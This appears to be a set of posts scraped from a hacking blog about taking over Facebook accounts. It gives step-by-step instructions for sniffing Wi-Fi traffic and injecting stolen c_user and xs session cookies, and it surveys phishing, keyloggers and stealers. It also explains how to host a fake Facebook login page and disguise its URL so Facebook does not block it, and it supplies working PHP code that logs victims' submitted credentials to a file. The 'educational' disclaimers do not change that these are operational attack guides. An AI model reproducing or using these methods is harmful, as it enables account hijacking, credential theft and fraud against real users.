Session Hijacking Facebook Accounts | .::APAJR::.

This is a tutorial that demonstrates just how simple it is to get access to facebook accounts without the user's password or username. This tutorial demonstrates Session Hijacking (discussed here: : www.facebook.com/APAJREngineerHackers  or  http://www.facebook.com/groups/Apajrengineerhackers/ ).  This is a simple attack done on an unsecured wifi network with the permission of all users on the network.

The aims of this tutorial are:

• Educate users on the dangers of using unsecured wireless connections.


• Educate wireless connections managers in the aim that they will protect their wireless network.


• Demonstrate the simplicity of this attack and why there is need to find a solution for this attack.


• Get users to stop using unsecure wireless connections.

Requirements:

• Someone on the network must be on facebook at the time for you to steal their session information.


• You Wi-Fi adapter must have monitor mode support in order to scan all packets transferred over a network. If it doesn't, you would only be scanning your own packets. To learn more about monitor mode and about enabling monitor mode on your Wireless card, visit http://www.aircrack-ng.org/doku.php?id=airmon-ng

So here is a step by step explanation of how to carry out this attack:

=> First of all, you would need to connect to an unsecured wireless connection that others are using. Then we start capturing packets transferred over this network. Note that your wireless adapter needs to support monitor mode to scan all packets transferred over a network. you can check your wi-fi card specifications to see if it supports monitor mode.

=>We would then need to use a network sniffing tool so sniff packets transferred over the network. In this case, I am using a tool called Wireshark (http://www.wireshark.org). Within wireshark, there is a menu called "Capture"; Under the capture menu, select interfaces from that menu, and a list of your interfaces will come up:





=> Next you select Start Next to the interface that you have enabled monitor mode on. most times it is the interface that is capturing the most packets. In my case, Microsoft interface is capturing the most packets, so i will select to start capturing with the microsoft interface. You would leave wireshark to capture packets for a couple of seconds depending on the amount of persons currently using the network. Say 30 seconds if 10 people currently are using the network, or 30 minutes if there is barely network activity going on. While capturing, wireshark will look something like this:





=> After capturing a certain amount of packets, or running the capture for a certain amount of time, stop it by clicking on the stop current capture button.





=> After stopping the capture, you will need to look for the user's facebook session cookie which, hopefully was transferred in one of the packets captured. to find this cookie, use the wireshark search which can be found by pressing "ctrl + f" on your keyboard. In this search interface, select Find: By "String"; Search In: "Packet Details". and Filter by the string "Cookie".





=> When you press find, if there is a cookie, this search will find it, if no cookie was captured, you will have to start back at step 2. However, if youre lucky and some cookies we're captured, when you search for cookie, your interface will come up looking like this in the diagram below. You would notice the cookie next to the arrow contains lots of data, to get the data. the next thing you do is to right click on the cookie and click copy->description.





=> After copying the description, paste it in a text file, and separate each variable to a new line (note the end of every variable is depicted by a semicolon eg - c_user=100002316516702;).

=> After some research and experimenting, i figured out that facebook authenticated the user session by 2 cookies called c_user and xs. Therefore you will only need the values of these cookies, and then need to inject them into your browser. Before injecting the cookies, here is what my facebook page looked like:





=> The next thing you would need to do is to inject this information as your own cookie. so firstly you would need to install a cookie manager extension for your browser, I'm using firefox Cookie Manager. After installing this extension, you will find it under Tools->cookie manager. The interface for cookie manager looks like this:





=> The first thing we would need to do is to clear all cookies, so clear all the cookies you currently have. Then select the "Add Cookie" link to add a new cookie. The first cookie you will add is the c_user cookie which will have the following information:: Domain - ".facebook.com", name-"c_user", value-"the value you copied earlier from the wireshark scanning" and the Path-"/"; leave the isSecure and Expires On values to default:





=> The next thing you do is to hit the "Add" button and the cookie is saved. Repeat the same steps to add the xs cookie with all of the same information, except the value, which would be the xs value you have.





=> After adding these 2 cookies, just go to facebook.com, refresh the page and... Boom!! you will see you are logged in as that user whose cookie information you stole. Here is my facebook page after i injected those cookies:

Read More

Top 10 Ways to Hack Facebook Accounts | .::APAJR::.

Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers have , I have written a couple of post related to facebook hacking here. I mentioned the top methods which were used by hackers to hack facebook accounts, however lots of things have changed in 2013, Lots of methods have went outdated or have been patched up by facebook and lots of new methods have been introduced, So in this post I will write the top 10 methods how hackers can hack facebook accounts.

10 Ways How Hackers Can Hack Facebook Accounts

So here are the top 10 methods which have been the most popular in 2012:

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealers 

Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's.

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

7. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

8. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

• How to make Your Pen-drive (USB) a Password Stealer

9. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article,

10. Botnets 

Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.

Read More

Facebook hacking | Phishing | Webhost [ Full tutorial ] | .::APAJR::.

 Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)

Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE


                                                     

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.

Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

.

Step 6: Now Click on the Public_html.

Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.

PS:> If www.p4o.net didn't worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

=============================================================
The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it

HOW TO FIND YOUR USERNAME?
Ok guys this is the most asked question of all so here is a simple answer, just look in the following picture of Admin Paned the red shaded area tells you the username of the website

.

===================================================================

Read More

Make Phishing Page of any site | .::APAJR::.

This tutorial is for educational purpose only.

Warning & Disclaimer:

Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then we will not responsible for it. Do anything on your own risk.

What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page.

How to create?

• Visit the page that you want to clone.


• Save it (CTRL+S) via your browser.


• Choose save complete webpage while saving it via browser.


• Give name index while saving. (Dont use other name!)


• Save it to a folder.


• Now, you should have one file named "index.htm" and a folder.


• We have to edit index.htm file.


• Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1" method="post" , We have to edit this line only. Changehttps://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.

How to create login.php?

Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.

Code:

<?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You have to change

http://www.google.com

 to the site url that you are cloning, for example, change it to

http://www.facebook.com/

 if you are cloning facebook.

Now, you have your phishing page.
 
Face book phishing page here
 
                       

 
 
 
 

Read More